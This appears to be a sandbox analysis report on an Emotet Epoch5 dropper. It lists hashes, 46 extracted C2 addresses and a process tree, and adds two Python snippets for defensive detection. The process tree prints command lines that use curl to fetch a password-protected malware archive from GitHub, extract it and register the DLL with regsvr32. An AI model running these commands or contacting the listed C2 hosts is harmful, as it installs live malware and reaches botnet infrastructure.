Analysis
max time kernel: 241s
max time network: 209s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31-05-2024 07:23
Static task: static1
General
Target: UltraDropper.exe
Size: 57KB
MD5: 354274b178062ef85722f8204629e78d
SHA1: 616229aa8f5169938a9f5b872cc03a60209fa46b
SHA256: d93cfa3cdbae1d62f1b55b7a0b60b547834cc144af1fc28b8afd69f9065f7f02
SHA512: afb96510a0c38a9e4eb74040adc504dc3ff46b4845ea60b2271296e28f530e0d8cf7df3d6c2b5d47fc9c0334792c6621b8b48ec06cfe66701353d357d7a5a53f
SSDEEP: 768:/t+et7EWvq3fuXjUp2+1pMh4d/J/rflOeTqOW7xQ8VORH:ztGfuLc/J/blOtr7xQ8Vs
Malware Config
Extracted family: emotet
Botnet: Epoch5
C2 (ip:port):
178.238.225.252:8080
139.196.72.155:8080
36.67.23.59:443
103.56.149.105:8080
37.44.244.177:8080
85.25.120.45:8080
202.134.4.210:7080
78.47.204.80:443
83.229.80.93:8080
93.104.209.107:8080
80.211.107.116:8080
165.22.254.236:8080
104.244.79.94:443
185.148.169.10:8080
190.145.8.4:443
175.126.176.79:8080
139.59.80.108:8080
188.165.79.151:443
128.199.217.206:443
64.227.55.231:8080
218.38.121.17:443
103.71.99.57:8080
103.224.241.74:8080
128.199.242.164:8080
85.214.67.203:8080
103.254.12.236:7080
46.101.98.60:8080
178.62.112.199:8080
210.57.209.142:8080
195.77.239.39:8080
103.126.216.86:443
82.98.180.154:7080
202.28.34.99:8080
174.138.33.49:7080
160.16.143.191:8080
51.75.33.122:443
103.41.204.169:8080
186.250.48.5:443
87.106.97.83:7080
118.98.72.86:443
196.44.98.190:8080
103.85.95.4:8080
62.171.178.147:8080
54.37.228.122:443
114.79.130.68:443
198.199.70.22:8080
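The list above is the C2 set the sandbox extracted from the sample's configuration. As an added example (not part of the sandbox report), the Python below parses a subset of those entries into a blocklist and runs it over constructed firewall log lines, reporting exact ip:port matches separately from IP-only matches. The log lines, their key=value layout, and the subset of entries used are assumptions made for illustration.

```python
"""Match firewall/proxy log lines against the Emotet Epoch5 C2 list above.

Added example, not part of the sandbox report. The C2 entries are a subset of
the report's extracted config; the log lines and their format are constructed
for illustration only.
"""
import ipaddress
import re
from collections import namedtuple

# Subset of the extracted Epoch5 C2 list (copied from the Malware Config above).
C2_CONFIG = """
178.238.225.252:8080
139.196.72.155:8080
36.67.23.59:443
103.56.149.105:8080
202.134.4.210:7080
78.47.204.80:443
198.199.70.22:8080
"""

Endpoint = namedtuple("Endpoint", "ip port")


def parse_c2_config(text):
    """Parse 'ip:port' lines into a set of Endpoint tuples.

    Blank lines are skipped; anything that is not a valid IP address with a
    valid port raises ValueError, so a corrupted feed does not silently shrink
    the blocklist.
    """
    endpoints = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        host, sep, port = line.rpartition(":")
        if not sep:
            raise ValueError(f"malformed C2 entry: {line!r}")
        ip = ipaddress.ip_address(host)  # raises ValueError on garbage
        port = int(port)
        if not 0 < port < 65536:
            raise ValueError(f"bad port in C2 entry: {line!r}")
        endpoints.add(Endpoint(str(ip), port))
    return endpoints


# Constructed log lines (illustrative; not taken from the report).
SAMPLE_LOGS = """
2024-05-31T07:25:01Z src=10.0.0.15:49712 dst=178.238.225.252:8080 proto=tcp action=allow
2024-05-31T07:25:02Z src=10.0.0.15:49713 dst=142.250.74.14:443 proto=tcp action=allow
2024-05-31T07:25:03Z src=10.0.0.22:49800 dst=36.67.23.59:443 proto=tcp action=allow
2024-05-31T07:25:04Z src=10.0.0.22:49801 dst=36.67.23.59:8080 proto=tcp action=deny
2024-05-31T07:25:05Z src=10.0.0.30:49900 dst=198.199.70.22:8080 proto=tcp action=allow
"""

# Assumed log layout: key=value fields with src=ip:port and dst=ip:port.
LOG_RE = re.compile(r"\bsrc=(?P<src>[\d.]+):\d+\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)")


def find_c2_hits(log_text, endpoints):
    """Return (line, kind) pairs for lines whose destination is on the C2 list.

    kind is 'exact' when ip and port both match an extracted entry, and
    'ip-only' when only the IP matches: a listed IP reached on an unlisted port
    still deserves a look, since the port can differ between config versions.
    """
    c2_ips = {e.ip for e in endpoints}
    hits = []
    for raw in log_text.splitlines():
        m = LOG_RE.search(raw)
        if not m:
            continue
        dst = Endpoint(m["dst"], int(m["dport"]))
        if dst in endpoints:
            hits.append((raw.strip(), "exact"))
        elif dst.ip in c2_ips:
            hits.append((raw.strip(), "ip-only"))
    return hits


if __name__ == "__main__":
    c2 = parse_c2_config(C2_CONFIG)
    for line, kind in find_c2_hits(SAMPLE_LOGS, c2):
        print(f"[{kind}] {line}")
```

Against the constructed lines this reports three exact hits and one ip-only hit (36.67.23.59 on 8080, where the config lists 443). Paste the full 46-entry list from the report into C2_CONFIG to use it as-is; the parser rejects any entry that is not a well-formed ip:port rather than dropping it.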
Signatures
Loads dropped DLL (2 IoCs)
Processes:
pid   process
3672  regsvr32.exe
4628  regsvr32.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
pid   process
3672  regsvr32.exe
3672  regsvr32.exe
4628  regsvr32.exe
4628  regsvr32.exe
4628  regsvr32.exe
4628  regsvr32.exe
Suspicious use of AdjustPrivilegeToken (8 IoCs)
Processes:
description                 pid   process
Token: SeRestorePrivilege   2700  7z.exe
Token: 35                   2700  7z.exe
Token: SeSecurityPrivilege  2700  7z.exe
Token: SeSecurityPrivilege  2700  7z.exe
Token: SeRestorePrivilege   404   7zG.exe
Token: 35                   404   7zG.exe
Token: SeSecurityPrivilege  404   7zG.exe
Token: SeSecurityPrivilege  404   7zG.exe
Suspicious use of FindShellTrayWindow (1 IoC)
Processes:
pid   process
404   7zG.exe
Suspicious use of WriteProcessMemory (14 IoCs)
Processes:
description                        pid   process           target process
PID 3380 wrote to memory of 3656   3380  UltraDropper.exe  cmd.exe
PID 3380 wrote to memory of 3656   3380  UltraDropper.exe  cmd.exe
PID 3380 wrote to memory of 3656   3380  UltraDropper.exe  cmd.exe
PID 3656 wrote to memory of 3464   3656  cmd.exe           curl.exe
PID 3656 wrote to memory of 3464   3656  cmd.exe           curl.exe
PID 3656 wrote to memory of 3464   3656  cmd.exe           curl.exe
PID 3656 wrote to memory of 2700   3656  cmd.exe           7z.exe
PID 3656 wrote to memory of 2700   3656  cmd.exe           7z.exe
PID 4008 wrote to memory of 2396   4008  cmd.exe           curl.exe
PID 4008 wrote to memory of 2396   4008  cmd.exe           curl.exe
PID 1688 wrote to memory of 3672   1688  cmd.exe           regsvr32.exe
PID 1688 wrote to memory of 3672   1688  cmd.exe           regsvr32.exe
PID 3672 wrote to memory of 4628   3672  regsvr32.exe      regsvr32.exe
PID 3672 wrote to memory of 4628   3672  regsvr32.exe      regsvr32.exe
Processes
C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe
  command: "C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"
  PID: 3380
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
    command: cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet(Epoch5)-.2022 10483280p" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"
    PID: 3656
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\curl.exe
      command: curl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet(Epoch5)-.2022 10483280p"
      PID: 3464
    C:\Program Files\7-Zip\7z.exe
      command: "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"
      PID: 2700
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\rundll32.exe
  command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 700
C:\Windows\System32\cmd.exe
  command: "C:\Windows\System32\cmd.exe"
  PID: 4008
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\curl.exe
    command: curl -L -o "Emotet-Epoch5.zip" https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip
    PID: 2396
C:\Program Files\7-Zip\7zG.exe
  command: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5\" -spe -an -ai#7zMap9460:106:7zEvent2310
  PID: 404
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
C:\Windows\System32\cmd.exe
  command: "C:\Windows\System32\cmd.exe"
  PID: 1688
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\regsvr32.exe
    command: regsvr32 emotet.dll
    PID: 3672
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\regsvr32.exe
      command: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QHAJNsT\yVWoZrzUSiIo.dll"
      PID: 4628
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
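The chain at the end of the tree above, regsvr32.exe (PID 3672) spawning a second regsvr32.exe (PID 4628) that loads the DLL from a randomly named subdirectory of System32, is the behaviour worth alerting on. The Python below is an added example and not part of the sandbox report: it runs a small detection over constructed process-creation events whose PIDs, image paths and command lines are copied from the tree above. The event schema (one dict per process creation), the parent PIDs of the top-level processes, and the benign control event are assumptions.

```python
"""Flag the regsvr32.exe -> regsvr32.exe DLL-loading chain from the process tree above.

Added example, not part of the sandbox report. The events below are constructed
dicts whose PIDs, image paths and command lines are copied from the report's
process tree; the parent PIDs of the top-level processes, the benign control
event and the event schema itself are assumptions.
"""
import re

EVENTS = [
    # Top-level processes; parent PID 0 is a placeholder (not in the report).
    {"pid": 3380, "ppid": 0, "image": r"C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"'},
    {"pid": 1688, "ppid": 0, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe"'},
    # First-stage regsvr32, launched from the interactive cmd.exe.
    {"pid": 3672, "ppid": 1688, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": "regsvr32 emotet.dll"},
    # Second-stage regsvr32 spawned by the first, loading the relocated DLL.
    {"pid": 4628, "ppid": 3672, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": r'C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QHAJNsT\yVWoZrzUSiIo.dll"'},
    # Constructed benign control: an installer registering its own COM DLL.
    {"pid": 5000, "ppid": 4999, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
]

REGSVR32 = re.compile(r"\\regsvr32\.exe$", re.IGNORECASE)
# Trailing argument that is an absolute path to a .dll, quoted or not.
DLL_ARG = re.compile(r'"?([A-Za-z]:\\[^"]+?\.dll)"?\s*$', re.IGNORECASE)
# A DLL exactly one directory below System32 (System32\<dir>\<name>.dll),
# which is where the second-stage regsvr32 in the report loaded its copy from.
SYS32_SUBDIR_DLL = re.compile(r"^[A-Za-z]:\\Windows\\system32\\[^\\]+\\[^\\]+\.dll$", re.IGNORECASE)


def extract_dll_path(cmdline):
    """Return the absolute .dll path passed to regsvr32, or None when the
    argument is a bare or relative name such as 'emotet.dll'."""
    m = DLL_ARG.search(cmdline)
    return m.group(1) if m else None


def score_regsvr32_event(event, by_pid):
    """Return the list of suspicious traits for one process-creation event."""
    reasons = []
    if not REGSVR32.search(event["image"]):
        return reasons
    parent = by_pid.get(event["ppid"])
    if parent is not None and REGSVR32.search(parent["image"]):
        reasons.append("regsvr32.exe spawned by regsvr32.exe (pid %d)" % parent["pid"])
    dll = extract_dll_path(event["cmdline"])
    if dll is not None and SYS32_SUBDIR_DLL.match(dll):
        reasons.append("DLL loaded from a System32 subdirectory: " + dll)
    return reasons


def detect_regsvr32_chain(events):
    """Map pid -> reasons for every event that trips at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        reasons = score_regsvr32_event(e, by_pid)
        if reasons:
            hits[e["pid"]] = reasons
    return hits


if __name__ == "__main__":
    for pid, reasons in detect_regsvr32_chain(EVENTS).items():
        print(pid, "; ".join(reasons))
```

Only PID 4628 trips both rules; the first-stage regsvr32 (PID 3672) registers a relative path from a user shell and is left alone, as is the constructed installer. In production the System32-subdirectory rule needs an allowlist for legitimate subdirectories such as drivers and wbem, or a join against file-creation events so that only a directory created moments before the load counts.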
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip
  Filesize: 90B
  MD5: 01f4771c47a56dbdf77642c80eb9b799
  SHA1: 6aead125925ec84c9171e3b29b9c2fc00682bda5
  SHA256: eec0a51a966b712aaccd11df320373becc55f174b97030419f9fae79f0cf542c
  SHA512: 8f4e2f726b5dd362d40e4576d53c426b262c3bbc48387f4d9ca18e4e70a78f77a1ffb007cb498b31523ca1278dd61a6c33fee636b732915a27f27248639e2162
C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip
  Filesize: 289KB
  MD5: ebe6bc9eab807cdd910976a341bc070d
  SHA1: 1052700b1945bb1754f3cadad669fc4a99f5607b
  SHA256: b0353f4547466a0a402198b3750d928fc7c4e96dd3adc00b181e9d98e4602ea7
  SHA512: 9a6bfcb90c1e24be1b930990dd2af72e889f71ad7e1a7b8353b6522a625e2ae36013793ee2c159880bd510b8f785ce4c9dfced1d2901d3ca8f091e26084185a8
C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5\emotet.dll
  Filesize: 534KB
  MD5: 56bb8500d7ab6860760eddd7a55e9456
  SHA1: e9b38c5fb51ce1a038f65c1620115a9bba1e383d
  SHA256: b4bead39ead2a29de2f0a6fb52eea172cfe25224b71e4a9b1418f55c8b053d59
  SHA512: 83ceff476d071412b02bab0753bd3c4440937b663397d73349fa90c38d96cf88051b645c781cbe5de281aa3bd45e71da7fcc8c99c2846ce29c2f36c3e1307a84
memory/3380-0-0x0000000000410000-0x0000000000422000-memory.dmp
  Filesize: 72KB
memory/3672-9-0x0000000002A00000-0x0000000002A30000-memory.dmp
  Filesize: 192KB
memory/3672-13-0x0000000180000000-0x000000018008C000-memory.dmp
  Filesize: 560KB